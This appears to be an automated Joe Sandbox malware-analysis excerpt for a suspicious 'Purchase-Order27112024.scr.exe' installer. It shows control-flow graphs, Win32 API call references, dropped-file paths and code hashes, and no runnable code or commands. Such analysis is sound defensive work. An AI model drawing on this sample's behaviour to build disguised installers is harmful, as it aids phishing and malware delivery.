                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\googly\pulsation$C:\Users\user\AppData\Local\googly\pulsation$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase-Order27112024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                      • API String ID: 4107622049-1372983555
                                                                                                      • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                                                                      • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 148 4055a7-4055ba SendMessageW 138->148 144 405593-405594 call 404173 140->144 145 405585-40558e call 4051f2 140->145 141->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 169 405637-405652 SendMessageW 165->169 168 40548e-405494 call 4041cf 166->168 167->168 168->163 169->169 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 169->170 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                                                                      • CloseClipboard.USER32 ref: 004056B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                      • String ID: {$&B
                                                                                                      • API String ID: 590372296-2518801558
                                                                                                      • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                                                                      • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-40608c call 405e15 450->456 451->450 453->446 458 4060b3-4060b6 455->458 459 4060a5-4060b1 GetSystemDirectoryW 455->459 468 406092-40609b call 405f6a 456->468 469 40612b-40612f 456->469 457->441 461 40617b 457->461 463 406121-406123 458->463 464 4060b8-4060c6 GetWindowsDirectoryW 458->464 462 406125-406129 459->462 466 40613c-406142 call 4061dc 461->466 462->466 462->469 463->462 467 4060c8-4060d2 463->467 464->463 466->441 474 4060d4-4060d7 467->474 475 4060ec-406102 SHGetSpecialFolderLocation 467->475 468->462 469->466 472 406131-406137 lstrcatW 469->472 472->466 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->462 478->479 479->463 480->462 480->475
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 900638850-764496434
                                                                                                      • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                                                      • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 488 40598c-405990 484->488 486 405818-40581a 485->486 487 405829-405839 call 405f48 485->487 489 405820-405823 486->489 490 40593a-40593f 486->490 494 405848-405849 call 4059df 487->494 495 40583b-405846 lstrcatW 487->495 489->487 489->490 490->488 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->488 497->488 505 405958-40596c call 405993 call 405788 497->505 501 405854-40585c 498->501 502 40585e-405864 lstrcatW 498->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 506 40588b-405893 504->506 507 40592f-405933 504->507 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 510 4058b3-4058c7 call 405f48 506->510 511 405895-40589d 506->511 507->490 509 405935 507->509 509->490 523 4058c9-4058d1 510->523 524 4058de-4058e9 call 405788 510->524 515 405912-405922 FindNextFileW 511->515 516 40589f-4058a7 511->516 515->506 519 405928-405929 FindClose 515->519 516->510 520 4058a9-4058b1 516->520 519->507 520->510 520->515 521->488 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->515 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->488 526->515 534->515 538 4058f0-405900 call 4051f2 call 405de2 535->538 539 405902-405908 535->539 538->515 539->515
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 004057F9
                                                                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405841
                                                                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405864
                                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 0040586A
                                                                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 0040587A
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                                                                      Strings
                                                                                                      • "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe", xrefs: 004057D9
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                                                                      • \*.*, xrefs: 0040583B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                      • API String ID: 2035342205-1807519440
                                                                                                      • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                                                                      • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
                                                                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: 8WB
                                                                                                      • API String ID: 2295610775-3088156181
                                                                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 310444273-0
                                                                                                      • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                      • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                                                                      • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                      • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
